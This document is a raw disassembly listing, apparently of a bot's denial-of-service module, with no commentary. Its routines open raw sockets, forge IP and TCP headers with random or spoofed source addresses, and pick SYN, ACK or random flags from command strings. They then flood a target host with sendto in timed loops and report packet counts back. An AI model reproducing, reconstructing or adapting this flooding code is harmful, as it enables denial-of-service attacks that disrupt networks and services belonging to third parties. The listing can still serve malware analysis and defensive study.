var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
Dst = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4CB944 ; WSAStartup
test eax, eax
jz short loc_414437
xor eax, eax
jmp loc_4146A5
; ---------------------------------------------------------------------------
loc_414437: ; CODE XREF: sub_4143F7+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4CBA78 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_41469D
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_414693
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_8]
call dword_4CB9D4 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_4CB9D4 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_4CB9D4 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_4CB9D4 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_42713C ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call __allmul
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_414522: ; CODE XREF: sub_4143F7+25D�j
; sub_4143F7+26B�j
mov [ebp+var_24], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4CB9D4 ; htons
mov [ebp+var_34], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_4CB9D4 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4CB9D0 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4CB9D4 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AA5F
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_8C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AA5F
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414667
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_414690
jl loc_414522
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_414690
jmp loc_414522
; ---------------------------------------------------------------------------
loc_414667: ; CODE XREF: sub_4143F7+247�j
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437AEC ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 10h
jmp short loc_414693
; ---------------------------------------------------------------------------
loc_414690: ; CODE XREF: sub_4143F7+25B�j
; sub_4143F7+269�j
mov ebx, [ebp+arg_8]
loc_414693: ; CODE XREF: sub_4143F7+78�j
; sub_4143F7+297�j
push [ebp+var_C]
call dword_4CBA6C ; closesocket
pop esi
loc_41469D: ; CODE XREF: sub_4143F7+5B�j
call dword_4CB92C ; WSACleanup
mov eax, ebx
loc_4146A5: ; CODE XREF: sub_4143F7+3B�j
pop edi
pop ebx
leave
retn
sub_4143F7 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4146A9(int,char *Str,int)
sub_4146A9 proc near ; CODE XREF: sub_414358+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40A8F0
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4143F7
add esp, 1Ch
test eax, eax
jnz short loc_4146F4
push 1
pop eax
loc_4146F4: ; CODE XREF: sub_4146A9+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4146A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414703 proc near ; DATA XREF: sub_401ACD+6D3D�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4CBA14 ; inet_addr
push eax
call sub_4147A6
pop ecx
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_437B0C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414787
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_409869
add esp, 14h
loc_414787: ; CODE XREF: sub_414703+62�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_414703 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147A6 proc near ; CODE XREF: sub_414703+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Src = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Dst = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
push 1
pop ecx
and [ebp+var_88], 0
push 4
and [ebp+var_58], 0
pop esi
mov ebx, 0FFh
push 6
xor eax, eax
pop edx
lea edi, [ebp+var_54]
mov [ebp+var_84], ecx
mov [ebp+var_80], 2
mov [ebp+var_7C], esi
mov [ebp+var_78], edx
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 11h
mov [ebp+var_68], 16h
mov [ebp+var_64], 29h
mov [ebp+var_60], 3Ah
mov [ebp+var_5C], ebx
mov [ebp+var_50], eax
stosd
lea edi, [ebp+var_2C]
mov [ebp+var_4C], eax
mov [ebp+var_48], eax
mov [ebp+var_44], 2000h
mov [ebp+var_40], esi
mov [ebp+var_3C], edx
mov [ebp+var_38], 3FFFh
mov [ebp+var_34], ecx
mov [ebp+var_30], eax
mov [ebp+var_28], ecx
stosd
mov edi, 100h
push edi ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov [ebp+var_4], eax
push edi
push eax
call dword_4CB9E8 ; gethostname
push [ebp+var_4]
call dword_4CBA58 ; gethostbyname
mov eax, [eax+0Ch]
push ebx
push 3
push 2
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
call dword_4CBA54 ; socket
lea ecx, [ebp+var_28]
push esi
push ecx
push 2
push 0
push eax
mov [ebp+var_4], eax
call dword_4CB9B4 ; setsockopt
mov esi, 200h
push esi ; Size
call _malloc
mov edi, ds:dword_4270B0
pop ecx
mov [ebp+Dst], eax
call edi ; GetTickCount
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
push 29Ah
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call dword_4CB9D4 ; htons
mov [ebp+var_96], ax
loc_4148C1: ; CODE XREF: sub_4147A6+1FC�j
call edi ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja loc_4149A7
call _rand
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call _rand
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_54], edx
call _rand
cdq
mov ecx, 1FA4h
mov [ebp+Src], 45h
idiv ecx
mov [ebp+var_23], 4
mov [ebp+var_2C], edx
call _rand
mov [ebp+var_20], ax
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_50]
push eax
call dword_4CB9D4 ; htons
push esi
mov [ebp+var_1E], ax
call dword_4CB9D4 ; htons
mov [ebp+var_22], ax
mov [ebp+var_1C], bl
call _rand
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_1B], al
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
lea eax, [ebp+Src]
push eax
call sub_40AA5F
mov [ebp+var_1A], ax
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push esi
push [ebp+Dst]
push [ebp+var_4]
call dword_4CBA38 ; sendto
jmp loc_4148C1
; ---------------------------------------------------------------------------
loc_4149A7: ; CODE XREF: sub_4147A6+12C�j
push [ebp+Dst]
call sub_41BA91
pop ecx
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_4147A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4149C1 proc near ; DATA XREF: sub_401ACD+5306�o
Dest = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
Str = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
Src = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
Dst = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_4270B0
call edi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
push 0FFh
push 3
push 2
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_414A8A
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437C24 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414A6A
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409869
add esp, 14h
loc_414A6A: ; CODE XREF: sub_4149C1+84�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414A8A: ; CODE XREF: sub_4149C1+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_414B08
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437BEC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414AE8
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409869
add esp, 14h
loc_414AE8: ; CODE XREF: sub_4149C1+102�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414B08: ; CODE XREF: sub_4149C1+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_414B78
lea eax, [ebp+Dest]
push offset asc_437BCC ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_414B58
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409869
add esp, 14h
loc_414B58: ; CODE XREF: sub_4149C1+172�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414B78: ; CODE XREF: sub_4149C1+157�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push ebx
call dword_4CB9D4 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_414BB0: ; CODE XREF: sub_4149C1+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_414E74
push 28h
mov [ebp+var_2C], 45h
call dword_4CB9D4 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_414C23
call _rand
mov esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_414C39
; ---------------------------------------------------------------------------
loc_414C23: ; CODE XREF: sub_4149C1+233�j
push [ebp+var_240]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_20], eax
loc_414C39: ; CODE XREF: sub_4149C1+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_414C57
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_414C5D
; ---------------------------------------------------------------------------
loc_414C57: ; CODE XREF: sub_4149C1+284�j
push [ebp+var_B8]
loc_414C5D: ; CODE XREF: sub_4149C1+294�j
call dword_4CB9D4 ; htons
mov [ebp+var_16], ax
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4CB9D4 ; htons
push 12345678h
mov [ebp+var_18], ax
call dword_4CB9D0 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+Str]
push offset aSyn ; "syn"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414CAD
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_414D09
; ---------------------------------------------------------------------------
loc_414CAD: ; CODE XREF: sub_4149C1+2E1�j
lea eax, [ebp+Str]
push offset aAck ; "ack"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414CCD
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_414D09
; ---------------------------------------------------------------------------
loc_414CCD: ; CODE XREF: sub_4149C1+301�j
lea eax, [ebp+Str]
push offset aRandom_0 ; "random"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414D09
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_414D09: ; CODE XREF: sub_4149C1+2EA�j
; sub_4149C1+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_4CB9D4 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+Src], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_4CB9D4 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_80]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AA5F
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_8C]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_78]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AA5F
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414DF6
inc [ebp+arg_0]
jmp loc_414BB0
; ---------------------------------------------------------------------------
loc_414DF6: ; CODE XREF: sub_4149C1+42B�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset asc_437B7C ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_414E54
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409869
add esp, 14h
loc_414E54: ; CODE XREF: sub_4149C1+46E�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414E74: ; CODE XREF: sub_4149C1+203�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset asc_437B2C ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_414EE5
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409869
add esp, 14h
loc_414EE5: ; CODE XREF: sub_4149C1+4FF�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_4149C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F05 proc near ; CODE XREF: sub_41500F+19A�p
; sub_41500F+1A9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, 1
mov [ebp+arg_4], esi
jle short loc_414F31
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_414F23: ; CODE XREF: sub_414F05+26�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_414F23
pop edi
cmp eax, 1
loc_414F31: ; CODE XREF: sub_414F05+12�j
jnz short loc_414F3E
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_414F3E: ; CODE XREF: sub_414F05:loc_414F31�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop ebp
retn
sub_414F05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F57 proc near ; DATA XREF: sub_401ACD+6C68�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4CBA14 ; inet_addr
push eax
lea esi, [ebp+var_194]
sub esp, 194h
push 65h
pop ecx
mov edi, esp
rep movsd
call sub_41500F
add esp, 19Ch
push eax
lea eax, [ebp+Dest]
push offset asc_437C58 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414FF2
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_409869
add esp, 14h
loc_414FF2: ; CODE XREF: sub_414F57+79�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
sub_414F57 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41500F proc near ; CODE XREF: sub_414F57+54�p
Dest = byte ptr -0CCh
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_A2 = word ptr -0A2h
Src = byte ptr -0A0h
var_8C = byte ptr -8Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
Dst = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0CCh
push ebx
push esi
mov esi, ds:dword_4270B0
xor ebx, ebx
push edi
mov [ebp+var_4], ebx
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_10], eax
call dword_4CBA54 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
mov edi, 578h
push edi ; Size
push 9
push 1
call sub_418BD1
pop ecx
pop ecx
push eax ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov esi, 5A0h
loc_415069: ; CODE XREF: sub_41500F+235�j
call ds:dword_4270B0 ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_415249
cmp dword_4CF180, ebx
jnz short loc_4150E8
push 10h
pop eax
mov [ebp+var_14], eax
push eax ; Size
lea eax, [ebp+var_68]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_68]
push eax
push [ebp+arg_0]
call dword_4CB978 ; getsockname
push 0FFh
push 1
call sub_418BD1
pop ecx
pop ecx
